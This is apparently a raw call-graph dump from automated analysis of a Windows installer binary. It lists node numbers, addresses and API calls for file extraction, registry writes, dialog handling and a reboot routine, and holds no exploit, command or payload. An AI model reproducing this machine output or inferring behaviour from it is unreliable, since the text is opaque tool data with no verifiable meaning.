3297->3300 3297->3320 3301 405cee lstrcatW 3298->3301 3303 405cf9 lstrlenW FindFirstFileW 3298->3303 3302 405de4 3300->3302 3301->3303 3304 405e23 3 API calls 3302->3304 3302->3320 3303->3297 3322 405d1b 3303->3322 3305 405dee 3304->3305 3308 405c18 5 API calls 3305->3308 3307 405da2 FindNextFileW 3310 405db8 FindClose 3307->3310 3307->3322 3309 405dfa 3308->3309 3311 405e14 3309->3311 3312 405dfe 3309->3312 3310->3297 3314 4055d9 28 API calls 3311->3314 3315 4055d9 28 API calls 3312->3315 3312->3320 3314->3320 3317 405e0b 3315->3317 3316 405c60 64 API calls 3316->3322 3319 406314 40 API calls 3317->3319 3318 4055d9 28 API calls 3318->3307 3319->3320 3321 4055d9 28 API calls 3321->3322 3322->3307 3322->3316 3322->3318 3322->3321 3343 406554 lstrcpynW 3322->3343 3344 405c18 3322->3344 3352 406314 MoveFileExW 3322->3352 3357 406554 lstrcpynW 3324->3357 3326 405f3c 3327 405ece 4 API calls 3326->3327 3328 405f42 3327->3328 3329 405c80 3328->3329 3330 406802 5 API calls 3328->3330 3329->3291 3329->3292 3336 405f52 3330->3336 3331 405f83 lstrlenW 3332 405f8e 3331->3332 3331->3336 3334 405e23 3 API calls 3332->3334 3333 4068b1 2 API calls 3333->3336 3335 405f93 GetFileAttributesW 3334->3335 3335->3329 3336->3329 3336->3331 3336->3333 3337 405e6f 2 API calls 3336->3337 3337->3331 3338->3294 3340 405e7d 3339->3340 3341 405e83 CharPrevW 3340->3341 3342 405e8f 3340->3342 3341->3340 3341->3342 3342->3298 3343->3322 3345 40601f 2 API calls 3344->3345 3346 405c24 3345->3346 3347 405c45 3346->3347 3348 405c33 RemoveDirectoryW 3346->3348 3349 405c3b DeleteFileW 3346->3349 3347->3322 3350 405c41 3348->3350 3349->3350 3350->3347 3351 405c51 SetFileAttributesW 3350->3351 3351->3347 3353 406337 3352->3353 3354 406328 3352->3354 3353->3322 3358 40619a 3354->3358 3357->3326 3359 4061f0 GetShortPathNameW 3358->3359 3360 4061ca 3358->3360 3361 406205 3359->3361 3362 40630f 3359->3362 3385 406044 GetFileAttributesW CreateFileW 3360->3385 3361->3362 3365 40620d wsprintfA 3361->3365 3362->3353 3364 4061d4 CloseHandle GetShortPathNameW 3364->3362 3366 4061e8 3364->3366 3367 406591 21 API calls 3365->3367 3366->3359 3366->3362 3368 406235 3367->3368 3386 406044 GetFileAttributesW CreateFileW 3368->3386 3370 406242 3370->3362 3371 406251 GetFileSize GlobalAlloc 3370->3371 3372 406273 3371->3372 3373 406308 CloseHandle 3371->3373 3374 4060c7 ReadFile 3372->3374 3373->3362 3375 40627b 3374->3375 3375->3373 3387 405fa9 lstrlenA 3375->3387 3378 406292 lstrcpyA 3381 4062b4 3378->3381 3379 4062a6 3380 405fa9 4 API calls 3379->3380 3380->3381 3382 4062eb SetFilePointer 3381->3382 3383 4060f6 WriteFile 3382->3383 3384 406301 GlobalFree 3383->3384 3384->3373 3385->3364 3386->3370 3388 405fea lstrlenA 3387->3388 3389 405ff2 3388->3389 3390 405fc3 lstrcmpiA 3388->3390 3389->3378 3389->3379 3390->3389 3391 405fe1 CharNextA 3390->3391 3391->3388 4156 401c68 4157 402da9 21 API calls 4156->4157 4158 401c6f 4157->4158 4159 402da9 21 API calls 4158->4159 4160 401c7c 4159->4160 4161 402dcb 21 API calls 4160->4161 4162 401c91 4160->4162 4161->4162 4163 402dcb 21 API calls 4162->4163 4168 401ca1 4162->4168 4163->4168 4164 401cf8 4167 402dcb 21 API calls 4164->4167 4165 401cac 4166 402da9 21 API calls 4165->4166 4169 401cb1 4166->4169 4170 401cfd 4167->4170 4168->4164 4168->4165 4171 402da9 21 API calls 4169->4171 4172 402dcb 21 API calls 4170->4172 4173 401cbd 4171->4173 4174 401d06 FindWindowExW 4172->4174 4175 401ce8 SendMessageW 4173->4175 4176 401cca SendMessageTimeoutW 4173->4176 4177 401d28 4174->4177 4175->4177 4176->4177 4178 4028e9 4179 4028ef 4178->4179 4180 4028f7 FindClose 4179->4180 4181 402c4f 4179->4181 4180->4181 4182 4016f1 4183 402dcb 21 API calls 4182->4183 4184 4016f7 GetFullPathNameW 4183->4184 4185 401711 4184->4185 4191 401733 4184->4191 4187 4068b1 2 API calls 4185->4187 4185->4191 4186 401748 GetShortPathNameW 4188 402c4f 4186->4188 4189 401723 4187->4189 4189->4191 4192 406554 lstrcpynW 4189->4192 4191->4186 4191->4188 4192->4191 4193 401e73 GetDC 4194 402da9 21 API calls 4193->4194 4195 401e85 GetDeviceCaps MulDiv ReleaseDC 4194->4195 4196 402da9 21 API calls 4195->4196 4197 401eb6 4196->4197 4198 406591 21 API calls 4197->4198 4199 401ef3 CreateFontIndirectW 4198->4199 4200 40265d 4199->4200 4201 402975 4202 402dcb 21 API calls 4201->4202 4203 402981 4202->4203 4204 402997 4203->4204 4205 402dcb 21 API calls 4203->4205 4206 40601f 2 API calls 4204->4206 4205->4204 4207 40299d 4206->4207 4229 406044 GetFileAttributesW CreateFileW 4207->4229 4209 4029aa 4210 402a60 4209->4210 4211 4029c5 GlobalAlloc 4209->4211 4212 402a48 4209->4212 4213 402a67 DeleteFileW 4210->4213 4214 402a7a 4210->4214 4211->4212 4215 4029de 4211->4215 4216 4032d9 35 API calls 4212->4216 4213->4214 4230 4034e7 SetFilePointer 4215->4230 4218 402a55 CloseHandle 4216->4218 4218->4210 4219 4029e4 4220 4034d1 ReadFile 4219->4220 4221 4029ed GlobalAlloc 4220->4221 4222 402a31 4221->4222 4223 4029fd 4221->4223 4224 4060f6 WriteFile 4222->4224 4225 4032d9 35 API calls 4223->4225 4226 402a3d GlobalFree 4224->4226 4228 402a0a 4225->4228 4226->4212 4227 402a28 GlobalFree 4227->4222 4228->4227 4229->4209 4230->4219 4231 4014f5 SetForegroundWindow 4232 402c4f 4231->4232 4233 40197b 4234 402dcb 21 API calls 4233->4234 4235 401982 lstrlenW 4234->4235 4236 40265d 4235->4236 3435 4020fd 3436 4021c1 3435->3436 3437 40210f 3435->3437 3439 401423 28 API calls 3436->3439 3438 402dcb 21 API calls 3437->3438 3440 402116 3438->3440 3446 40231b 3439->3446 3441 402dcb 21 API calls 3440->3441 3442 40211f 3441->3442 3443 402135 LoadLibraryExW 3442->3443 3444 402127 GetModuleHandleW 3442->3444 3443->3436 3445 402146 3443->3445 3444->3443 3444->3445 3455 4069b7 3445->3455 3449 402190 3451 4055d9 28 API calls 3449->3451 3450 402157 3452 401423 28 API calls 3450->3452 3453 402167 3450->3453 3451->3453 3452->3453 3453->3446 3454 4021b3 FreeLibrary 3453->3454 3454->3446 3460 406576 WideCharToMultiByte 3455->3460 3457 4069d4 3458 4069db GetProcAddress 3457->3458 3459 402151 3457->3459 3458->3459 3459->3449 3459->3450 3460->3457 4237 40497d 4238 4049b3 4237->4238 4239 40498d 4237->4239 4241 40453a 8 API calls 4238->4241 4240 4044d3 22 API calls 4239->4240 4242 40499a SetDlgItemTextW 4240->4242 4243 4049bf 4241->4243 4242->4238 4244 402b7e 4245 402bd0 4244->4245 4247 402b85 4244->4247 4246 406948 5 API calls 4245->4246 4250 402bd7 4246->4250 4248 402bce 4247->4248 4249 402da9 21 API calls 4247->4249 4251 402b93 4249->4251 4252 402dcb 21 API calls 4250->4252 4254 402da9 21 API calls 4251->4254 4253 402be0 4252->4253 4253->4248 4255 402be4 IIDFromString 4253->4255 4257 402b9f 4254->4257 4255->4248 4256 402bf3 4255->4256 4256->4248 4262 406554 lstrcpynW 4256->4262 4261 40649b wsprintfW 4257->4261 4259 402c10 CoTaskMemFree 4259->4248 4261->4248 4262->4259 4263 401000 4264 401037 BeginPaint GetClientRect 4263->4264 4265 40100c DefWindowProcW 4263->4265 4267 4010f3 4264->4267 4270 401179 4265->4270 4268 401073 CreateBrushIndirect FillRect DeleteObject 4267->4268 4269 4010fc 4267->4269 4268->4267 4271 401102 CreateFontIndirectW 4269->4271 4272 401167 EndPaint 4269->4272 4271->4272 4273 401112 6 API calls 4271->4273 4272->4270 4273->4272 4274 402a80 4275 402da9 21 API calls 4274->4275 4276 402a86 4275->4276 4277 402ac9 4276->4277 4278 402aad 4276->4278 4285 402953 4276->4285 4279 402ae3 4277->4279 4280 402ad3 4277->4280 4283 402ab2 4278->4283 4287 402ac3 4278->4287 4282 406591 21 API calls 4279->4282 4281 402da9 21 API calls 4280->4281 4281->4287 4282->4287 4288 406554 lstrcpynW 4283->4288 4287->4285 4289 40649b wsprintfW 4287->4289 4288->4285 4289->4285 3139 401781 3145 402dcb 3139->3145 3143 40178f 3144 406073 2 API calls 3143->3144 3144->3143 3146 402dd7 3145->3146 3147 406591 21 API calls 3146->3147 3148 402df8 3147->3148 3149 401788 3148->3149 3150 406802 5 API calls 3148->3150 3151 406073 3149->3151 3150->3149 3152 406080 GetTickCount GetTempFileNameW 3151->3152 3153 4060b6 3152->3153 3154 4060ba 3152->3154 3153->3152 3153->3154 3154->3143 4290 401d82 4291 402da9 21 API calls 4290->4291 4292 401d93 SetWindowLongW 4291->4292 4293 402c4f 4292->4293 4294 401503 4295 401508 4294->4295 4296 40152e 4294->4296 4297 402da9 21 API calls 4295->4297 4297->4296 4298 402903 4299 40290b 4298->4299 4300 40290f FindNextFileW 4299->4300 4302 402921 4299->4302 4301 402968 4300->4301 4300->4302 4304 406554 lstrcpynW 4301->4304 4304->4302 4305 401588 4306 402bc9 4305->4306 4309 40649b wsprintfW 4306->4309 4308 402bce 4309->4308 3420 401389 3421 401390 3420->3421 3422 4013fe 3421->3422 3423 4013cb MulDiv SendMessageW 3421->3423 3423->3421 4310 404609 lstrcpynW lstrlenW 4311 40198d 4312 402da9 21 API calls 4311->4312 4313 401994 4312->4313 4314 402da9 21 API calls 4313->4314 4315 4019a1 4314->4315 4316 402dcb 21 API calls 4315->4316 4317 4019b8 lstrlenW 4316->4317 4318 4019c9 4317->4318 4321 401a0a 4318->4321 4323 406554 lstrcpynW 4318->4323 4320 4019fa 4320->4321 4322 4019ff lstrlenW 4320->4322 4322->4321 4323->4320 4324 40168f 4325 402dcb 21 API calls 4324->4325 4326 401695 4325->4326 4327 4068b1 2 API calls 4326->4327 4328 40169b 4327->4328 4329 402b10 4330 402da9 21 API calls 4329->4330 4331 402b16 4330->4331 4332 406591 21 API calls 4331->4332 4333 402953 4331->4333 4332->4333 4334 402711 4335 402da9 21 API calls 4334->4335 4336 402720 4335->4336 4337 40276a ReadFile 4336->4337 4338 4060c7 ReadFile 4336->4338 4339 406125 5 API calls 4336->4339 4340 4027aa MultiByteToWideChar 4336->4340 4341 40285f 4336->4341 4343 4027d0 SetFilePointer MultiByteToWideChar 4336->4343 4344 402870 4336->4344 4346 40285d 4336->4346 4337->4336 4337->4346 4338->4336 4339->4336 4340->4336 4347 40649b wsprintfW 4341->4347 4343->4336 4345 402891 SetFilePointer 4344->4345 4344->4346 4345->4346 4347->4346 4348 401491 4349 4055d9 28 API calls 4348->4349 4350 401498 4349->4350 4351 404692 4352 4046aa 4351->4352 4356 4047c4 4351->4356 4357 4044d3 22 API calls 4352->4357 4353 40482e 4354 4048f8 4353->4354 4355 404838 GetDlgItem 4353->4355 4362 40453a 8 API calls 4354->4362 4358 404852 4355->4358 4359 4048b9 4355->4359 4356->4353 4356->4354 4360 4047ff GetDlgItem SendMessageW 4356->4360 4361 404711 4357->4361 4358->4359 4366 404878 SendMessageW LoadCursorW SetCursor 4358->4366 4359->4354 4363 4048cb 4359->4363 4384 4044f5 EnableWindow 4360->4384 4365 4044d3 22 API calls 4361->4365 4372 4048f3 4362->4372 4367 4048e1 4363->4367 4368 4048d1 SendMessageW 4363->4368 4370 40471e CheckDlgButton 4365->4370 4385 404941 4366->4385 4367->4372 4373 4048e7 SendMessageW 4367->4373 4368->4367 4369 404829 4374 40491d SendMessageW 4369->4374 4382 4044f5 EnableWindow 4370->4382 4373->4372 4374->4353 4377 40473c GetDlgItem 4383 404508 SendMessageW 4377->4383 4379 404752 SendMessageW 4380 404778 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4379->4380 4381 40476f GetSysColor 4379->4381 4380->4372 4381->4380 4382->4377 4383->4379 4384->4369 4388 405b7a ShellExecuteExW 4385->4388 4387 4048a7 LoadCursorW SetCursor 4387->4359 4388->4387 3155 401794 3156 402dcb 21 API calls 3155->3156 3157 40179b 3156->3157 3158 4017c3 3157->3158 3159 4017bb 3157->3159 3226 406554 lstrcpynW 3158->3226 3225 406554 lstrcpynW 3159->3225 3162 4017c1 3166 406802 5 API calls 3162->3166 3163 4017ce 3227 405e23 lstrlenW CharPrevW 3163->3227 3172 4017e0 3166->3172 3170 4017f2 CompareFileTime 3170->3172 3171 4018b2 3194 4055d9 3171->3194 3172->3170 3172->3171 3175 406554 lstrcpynW 3172->3175 3182 406591 21 API calls 3172->3182 3188 405bb4 MessageBoxIndirectW 3172->3188 3191 401889 3172->3191 3193 406044 GetFileAttributesW CreateFileW 3172->3193 3230 4068b1 FindFirstFileW 3172->3230 3233 40601f GetFileAttributesW 3172->3233 3174 4055d9 28 API calls 3177 40189e 3174->3177 3175->3172 3180 4018e3 SetFileTime 3181 4018f5 CloseHandle 3180->3181 3181->3177 3183 401906 3181->3183 3182->3172 3184 40190b 3183->3184 3185 40191e 3183->3185 3186 406591 21 API calls 3184->3186 3187 406591 21 API calls 3185->3187 3189 401913 lstrcatW 3186->3189 3190 401926 3187->3190 3188->3172 3189->3190 3192 405bb4 MessageBoxIndirectW 3190->3192 3191->3174 3191->3177 3192->3177 3193->3172 3195 4055f4 3194->3195 3204 4018bc 3194->3204 3196 405610 lstrlenW 3195->3196 3197 406591 21 API calls 3195->3197 3198 405639 3196->3198 3199 40561e lstrlenW 3196->3199 3197->3196 3201 40564c 3198->3201 3202 40563f SetWindowTextW 3198->3202 3200 405630 lstrcatW 3199->3200 3199->3204 3200->3198 3203 405652 SendMessageW SendMessageW SendMessageW 3201->3203 3201->3204 3202->3201 3203->3204 3205 4032d9 3204->3205 3207 4032f2 3205->3207 3206 403320 3236 4034d1 3206->3236 3207->3206 3241 4034e7 SetFilePointer 3207->3241 3211 40346a 3213 4034ac 3211->3213 3214 40346e 3211->3214 3212 40333d GetTickCount 3215 403369 3212->3215 3218 4018cf 3212->3218 3217 4034d1 ReadFile 3213->3217 3214->3218 3219 4034d1 ReadFile 3214->3219 3220 4060f6 WriteFile 3214->3220 3216 4034d1 ReadFile 3215->3216 3215->3218 3221 4033bf GetTickCount 3215->3221 3222 4033e4 MulDiv wsprintfW 3215->3222 3239 4060f6 WriteFile 3215->3239 3216->3215 3217->3218 3218->3180 3218->3181 3219->3214 3220->3214 3221->3215 3223 4055d9 28 API calls 3222->3223 3223->3215 3225->3162 3226->3163 3228 4017d4 lstrcatW 3227->3228 3229 405e3f lstrcatW 3227->3229 3228->3162 3229->3228 3231 4068d2 3230->3231 3232 4068c7 FindClose 3230->3232 3231->3172 3232->3231 3234 406031 SetFileAttributesW 3233->3234 3235 40603e 3233->3235 3234->3235 3235->3172 3242 4060c7 ReadFile 3236->3242 3240 406114 3239->3240 3240->3215 3241->3206 3243 40332b 3242->3243 3243->3211 3243->3212 3243->3218 4389 401a97 4390 402da9 21 API calls 4389->4390 4391 401aa0 4390->4391 4392 402da9 21 API calls 4391->4392 4393 401a45 4392->4393 4394 405718 4395 4058c2 4394->4395 4396 405739 GetDlgItem GetDlgItem GetDlgItem 4394->4396 4398 4058f3 4395->4398 4399 4058cb GetDlgItem CreateThread CloseHandle 4395->4399 4439 404508 SendMessageW 4396->4439 4401 40591e 4398->4401 4402 405943 4398->4402 4403 40590a ShowWindow ShowWindow 4398->4403 4399->4398 4400 4057a9 4405 4057b0 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4400->4405 4404 40597e 4401->4404 4407 405932 4401->4407 4408 405958 ShowWindow 4401->4408 4409 40453a 8 API calls 4402->4409 4441 404508 SendMessageW 4403->4441 4404->4402 4414 40598c SendMessageW 4404->4414 4412 405802 SendMessageW SendMessageW 4405->4412 4413 40581e 4405->4413 4415 4044ac SendMessageW 4407->4415 4410 405978 4408->4410 4411 40596a 4408->4411 4416 405951 4409->4416 4418 4044ac SendMessageW 4410->4418 4417 4055d9 28 API calls 4411->4417 4412->4413 4419 405831 4413->4419 4420 405823 SendMessageW 4413->4420 4414->4416 4421 4059a5 CreatePopupMenu 4414->4421 4415->4402 4417->4410 4418->4404 4423 4044d3 22 API calls 4419->4423 4420->4419 4422 406591 21 API calls 4421->4422 4424 4059b5 AppendMenuW 4422->4424 4425 405841 4423->4425 4426 4059d2 GetWindowRect 4424->4426 4427 4059e5 TrackPopupMenu 4424->4427 4428 40584a ShowWindow 4425->4428 4429 40587e GetDlgItem SendMessageW 4425->4429 4426->4427 4427->4416 4431 405a00 4427->4431 4432 405860 ShowWindow 4428->4432 4433 40586d 4428->4433 4429->4416 4430 4058a5 SendMessageW SendMessageW 4429->4430 4430->4416 4434 405a1c SendMessageW 4431->4434 4432->4433 4440 404508 SendMessageW 4433->4440 4434->4434 4436 405a39 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4434->4436 4437 405a5e SendMessageW 4436->4437 4437->4437 4438 405a87 GlobalUnlock SetClipboardData CloseClipboard 4437->4438 4438->4416 4439->4400 4440->4429 4441->4401 4442 401598 4443 4015b1 4442->4443 4444 4015a8 ShowWindow 4442->4444 4445 402c4f 4443->4445 4446 4015bf ShowWindow 4443->4446 4444->4443 4446->4445 4447 402419 4448 402dcb 21 API calls 4447->4448 4449 402428 4448->4449 4450 402dcb 21 API calls 4449->4450 4451 402431 4450->4451 4452 402dcb 21 API calls 4451->4452 4453 40243b GetPrivateProfileStringW 4452->4453 4454 404d1a 4455 404d46 4454->4455 4456 404d2a 4454->4456 4457 404d79 4455->4457 4458 404d4c SHGetPathFromIDListW 4455->4458 4465 405b98 GetDlgItemTextW 4456->4465 4460 404d5c 4458->4460 4464 404d63 SendMessageW 4458->4464 4462 40140b 2 API calls 4460->4462 4461 404d37 SendMessageW 4461->4455 4462->4464 4464->4457 4465->4461 4466 40201b 4467 402dcb 21 API calls 4466->4467 4468 402022 4467->4468 4469 4068b1 2 API calls 4468->4469 4470 402028 4469->4470 4471 402039 4470->4471 4473 40649b wsprintfW 4470->4473 4473->4471 4474 401b9c 4475 402dcb 21 API calls 4474->4475 4476 401ba3 4475->4476 4477 402da9 21 API calls 4476->4477 4478 401bac wsprintfW 4477->4478 4479 402c4f 4478->4479 4480 40149e 4481 4014ac PostQuitMessage 4480->4481 4482 4023c2 4480->4482 4481->4482 4483 4016a0 4484 402dcb 21 API calls 4483->4484 4485 4016a7 4484->4485 4486 402dcb 21 API calls 4485->4486 4487 4016b0 4486->4487 4488 402dcb 21 API calls 4487->4488 4489 4016b9 MoveFileW 4488->4489 4490 4016cc 4489->4490 4496 4016c5 4489->4496 4492 4068b1 2 API calls 4490->4492 4493 40231b 4490->4493 4491 401423 28 API calls 4491->4493 4494 4016db 4492->4494 4494->4493 4495 406314 40 API calls 4494->4495 4495->4496 4496->4491 4497 401a24 4498 402dcb 21 API calls 4497->4498 4499 401a2b 4498->4499 4500 402dcb 21 API calls 4499->4500 4501 401a34 4500->4501 4502 401a3b lstrcmpiW 4501->4502 4503 401a4d lstrcmpW 4501->4503 4504 401a41 4502->4504 4503->4504 4505 402324 4506 402dcb 21 API calls 4505->4506 4507 40232a 4506->4507 4508 402dcb 21 API calls 4507->4508 4509 402333 4508->4509 4510 402dcb 21 API calls 4509->4510 4511 40233c 4510->4511 4512 4068b1 2 API calls 4511->4512 4513 402345 4512->4513 4514 402356 lstrlenW lstrlenW 4513->4514 4515 402349 4513->4515 4517 4055d9 28 API calls 4514->4517 4516 4055d9 28 API calls 4515->4516 4519 402351 4515->4519 4516->4519 4518 402394 SHFileOperationW 4517->4518 4518->4515 4518->4519 4520 401da6 4521 401db9 GetDlgItem 4520->4521 4522 401dac 4520->4522 4524 401db3 4521->4524 4523 402da9 21 API calls 4522->4523 4523->4524 4525 401dfa GetClientRect LoadImageW SendMessageW 4524->4525 4526 402dcb 21 API calls 4524->4526 4528 401e58 4525->4528 4530 401e64 4525->4530 4526->4525 4529 401e5d DeleteObject 4528->4529 4528->4530 4529->4530 4531 4023a8 4532 4023af 4531->4532 4535 4023c2 4531->4535 4533 406591 21 API calls 4532->4533 4534 4023bc 4533->4534 4536 405bb4 MessageBoxIndirectW 4534->4536 4536->4535 4537 402c2a SendMessageW 4538 402c44 InvalidateRect 4537->4538 4539 402c4f 4537->4539 4538->4539 3461 4024af 3462 402dcb 21 API calls 3461->3462 3463 4024c1 3462->3463 3464 402dcb 21 API calls 3463->3464 3465 4024cb 3464->3465 3478 402e5b 3465->3478 3468 402953 3469 402503 3471 40250f 3469->3471 3482 402da9 3469->3482 3470 402dcb 21 API calls 3473 4024f9 lstrlenW 3470->3473 3472 40252e RegSetValueExW 3471->3472 3475 4032d9 35 API calls 3471->3475 3476 402544 RegCloseKey 3472->3476 3473->3469 3475->3472 3476->3468 3479 402e76 3478->3479 3485 4063ef 3479->3485 3483 406591 21 API calls 3482->3483 3484 402dbe 3483->3484 3484->3471 3486 4063fe 3485->3486 3487 4024db 3486->3487 3488 406409 RegCreateKeyExW 3486->3488 3487->3468 3487->3469 3487->3470 3488->3487 3489 40352f SetErrorMode GetVersionExW 3490 403583 GetVersionExW 3489->3490 3491 4035bb 3489->3491 3490->3491 3492 403612 3491->3492 3493 406948 5 API calls 3491->3493 3494 4068d8 3 API calls 3492->3494 3493->3492 3495 403628 lstrlenA 3494->3495 3495->3492 3496 403638 3495->3496 3497 406948 5 API calls 3496->3497 3498 40363f 3497->3498 3499 406948 5 API calls 3498->3499 3500 403646 3499->3500 3501 406948 5 API calls 3500->3501 3502 403652 #17 OleInitialize SHGetFileInfoW 3501->3502 3577 406554 lstrcpynW 3502->3577 3505 4036a1 GetCommandLineW 3578 406554 lstrcpynW 3505->3578 3507 4036b3 3508 405e50 CharNextW 3507->3508 3509 4036d9 CharNextW 3508->3509 3515 4036eb 3509->3515 3510 4037ed 3511 403801 GetTempPathW 3510->3511 3579 4034fe 3511->3579 3513 403819 3516 403873 DeleteFileW 3513->3516 3517 40381d GetWindowsDirectoryW lstrcatW 3513->3517 3514 405e50 CharNextW 3514->3515 3515->3510 3515->3514 3522 4037ef 3515->3522 3589 4030a2 GetTickCount GetModuleFileNameW 3516->3589 3519 4034fe 12 API calls 3517->3519 3520 403839 3519->3520 3520->3516 3521 40383d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3520->3521 3524 4034fe 12 API calls 3521->3524 3674 406554 lstrcpynW 3522->3674 3523 403a7a ExitProcess CoUninitialize 3525 403ab0 3523->3525 3526 403a8c 3523->3526 3529 40386b 3524->3529 3532 403b34 ExitProcess 3525->3532 3533 403ab8 GetCurrentProcess OpenProcessToken 3525->3533 3530 405bb4 MessageBoxIndirectW 3526->3530 3527 403887 3527->3523 3531 405e50 CharNextW 3527->3531 3560 40392e 3527->3560 3529->3516 3529->3523 3536 403a9a ExitProcess 3530->3536 3546 4038a6 3531->3546 3537 403ad0 LookupPrivilegeValueW AdjustTokenPrivileges 3533->3537 3538 403b04 3533->3538 3537->3538 3540 406948 5 API calls 3538->3540 3543 403b0b 3540->3543 3541 403904 3544 405f2b 18 API calls 3541->3544 3542 403947 3545 405b1f 5 API calls 3542->3545 3547 403b20 ExitWindowsEx 3543->3547 3549 403b2d 3543->3549 3548 403910 3544->3548 3550 40394c lstrlenW 3545->3550 3546->3541 3546->3542 3547->3532 3547->3549 3548->3523 3675 406554 lstrcpynW 3548->3675 3679 40140b 3549->3679 3677 406554 lstrcpynW 3550->3677 3553 403966 3555 40397e 3553->3555 3678 406554 lstrcpynW 3553->3678 3559 4039a4 wsprintfW 3555->3559 3575 4039d0 3555->3575 3556 403923 3676 406554 lstrcpynW 3556->3676 3561 406591 21 API calls 3559->3561 3617 403c26 3560->3617 3561->3555 3562 405aa8 2 API calls 3562->3575 3563 405b02 2 API calls 3563->3575 3564 4039e0 GetFileAttributesW 3567 4039ec DeleteFileW 3564->3567 3564->3575 3565 403a1a SetCurrentDirectoryW 3566 406314 40 API calls 3565->3566 3569 403a29 CopyFileW 3566->3569 3567->3575 3568 403a18 3568->3523 3569->3568 3569->3575 3570 405c60 71 API calls 3570->3575 3571 406314 40 API calls 3571->3575 3572 406591 21 API calls 3572->3575 3573 405b37 2 API calls 3573->3575 3574 403aa2 CloseHandle 3574->3568 3575->3555 3575->3559 3575->3562 3575->3563 3575->3564 3575->3565 3575->3568 3575->3570 3575->3571 3575->3572 3575->3573 3575->3574 3576 4068b1 2 API calls 3575->3576 3576->3575 3577->3505 3578->3507 3580 406802 5 API calls 3579->3580 3582 40350a 3580->3582 3581 403514 3581->3513 3582->3581 3583 405e23 3 API calls 3582->3583 3584 40351c 3583->3584 3585 405b02 2 API calls 3584->3585 3586 403522 3585->3586 3587 406073 2 API calls 3586->3587 3588 40352d 3587->3588 3588->3513 3682 406044 GetFileAttributesW CreateFileW 3589->3682 3591 4030e2 3609 4030f2 3591->3609 3683 406554 lstrcpynW 3591->3683 3593 403108 3594 405e6f 2 API calls 3593->3594 3595 40310e 3594->3595 3684 406554 lstrcpynW 3595->3684 3597 403119 GetFileSize 3598 403213 3597->3598 3611 403130 3597->3611 3685 40303e 3598->3685 3600 40321c 3602 40324c GlobalAlloc 3600->3602 3600->3609 3697 4034e7 SetFilePointer 3600->3697 3601 4034d1 ReadFile 3601->3611 3696 4034e7 SetFilePointer 3602->3696 3604 40327f 3606 40303e 6 API calls 3604->3606 3606->3609 3607 403235 3610 4034d1 ReadFile 3607->3610 3608 403267 3612 4032d9 35 API calls 3608->3612 3609->3527 3613 403240 3610->3613 3611->3598 3611->3601 3611->3604 3611->3609 3614 40303e 6 API calls 3611->3614 3615 403273 3612->3615 3613->3602 3613->3609 3614->3611 3615->3609 3615->3615 3616 4032b0 SetFilePointer 3615->3616 3616->3609 3618 406948 5 API calls 3617->3618 3619 403c3a 3618->3619 3620 403c40 GetUserDefaultUILanguage 3619->3620 3621 403c52 3619->3621 3698 40649b wsprintfW 3620->3698 3622 406422 3 API calls 3621->3622 3624 403c82 3622->3624 3626 403ca1 lstrcatW 3624->3626 3627 406422 3 API calls 3624->3627 3625 403c50 3699 403efc 3625->3699 3626->3625 3627->3626 3630 405f2b 18 API calls 3631 403cd3 3630->3631 3632 403d67 3631->3632 3634 406422 3 API calls 3631->3634 3633 405f2b 18 API calls 3632->3633 3635 403d6d 3633->3635 3636 403d05 3634->3636 3637 403d7d LoadImageW 3635->3637 3638 406591 21 API calls 3635->3638 3636->3632 3644 403d26 lstrlenW 3636->3644 3645 405e50 CharNextW 3636->3645 3639 403e23 3637->3639 3640 403da4 RegisterClassW 3637->3640 3638->3637 3643 40140b 2 API calls 3639->3643 3641 40393e 3640->3641 3642 403dda SystemParametersInfoW CreateWindowExW 3640->3642 3641->3523 3642->3639 3648 403e29 3643->3648 3646 403d34 lstrcmpiW 3644->3646 3647 403d5a 3644->3647 3649 403d23 3645->3649 3646->3647 3650 403d44 GetFileAttributesW 3646->3650 3651 405e23 3 API calls 3647->3651 3648->3641 3653 403efc 22 API calls 3648->3653 3649->3644 3652 403d50 3650->3652 3654 403d60 3651->3654 3652->3647 3655 405e6f 2 API calls 3652->3655 3656 403e3a 3653->3656 3707 406554 lstrcpynW 3654->3707 3655->3647 3658 403e46 ShowWindow 3656->3658 3659 403ec9 3656->3659 3661 4068d8 3 API calls 3658->3661 3708 4056ac OleInitialize 3659->3708 3663 403e5e 3661->3663 3662 403ecf 3664 403ed3 3662->3664 3665 403eeb 3662->3665 3666 403e6c GetClassInfoW 3663->3666 3670 4068d8 3 API calls 3663->3670 3664->3641 3672 40140b 2 API calls 3664->3672 3669 40140b 2 API calls 3665->3669 3667 403e80 GetClassInfoW RegisterClassW 3666->3667 3668 403e96 DialogBoxParamW 3666->3668 3667->3668 3671 40140b 2 API calls 3668->3671 3669->3641 3670->3666 3673 403ebe 3671->3673 3672->3641 3673->3641 3674->3511 3675->3556 3676->3560 3677->3553 3678->3555 3680 401389 2 API calls 3679->3680 3681 401420 3680->3681 3681->3532 3682->3591 3683->3593 3684->3597 3686 403047 3685->3686 3687 40305f 3685->3687 3688 403050 DestroyWindow 3686->3688 3689 403057 3686->3689 3690 403067 3687->3690 3691 40306f GetTickCount 3687->3691 3688->3689 3689->3600 3694 406984 2 API calls 3690->3694 3692 4030a0 3691->3692 3693 40307d CreateDialogParamW ShowWindow 3691->3693 3692->3600 3693->3692 3695 40306d 3694->3695 3695->3600 3696->3608 3697->3607 3698->3625 3700 403f10 3699->3700 3715 40649b wsprintfW 3700->3715 3702 403f81 3716 403fb5 3702->3716 3704 403cb1 3704->3630 3705 403f86 3705->3704 3706 406591 21 API calls 3705->3706 3706->3705 3707->3632 3719 40451f 3708->3719 3710 4056cf 3714 4056f6 3710->3714 3722 401389 3710->3722 3711 40451f SendMessageW 3712 405708 OleUninitialize 3711->3712 3712->3662 3714->3711 3715->3702 3717 406591 21 API calls 3716->3717 3718 403fc3 SetWindowTextW 3717->3718 3718->3705 3720 404537 3719->3720 3721 404528 SendMessageW 3719->3721 3720->3710 3721->3720 3723 401390 3722->3723 3724 4013fe 3723->3724 3725 4013cb MulDiv SendMessageW 3723->3725 3724->3710 3725->3723 4540 402930 4541 402dcb 21 API calls 4540->4541 4542 402937 FindFirstFileW 4541->4542 4543 40295f 4542->4543 4546 40294a 4542->4546 4544 402968 4543->4544 4548 40649b wsprintfW 4543->4548 4549 406554 lstrcpynW 4544->4549 4548->4544 4549->4546 4550 401931 4551 401968 4550->4551 4552 402dcb 21 API calls 4551->4552 4553 40196d 4552->4553 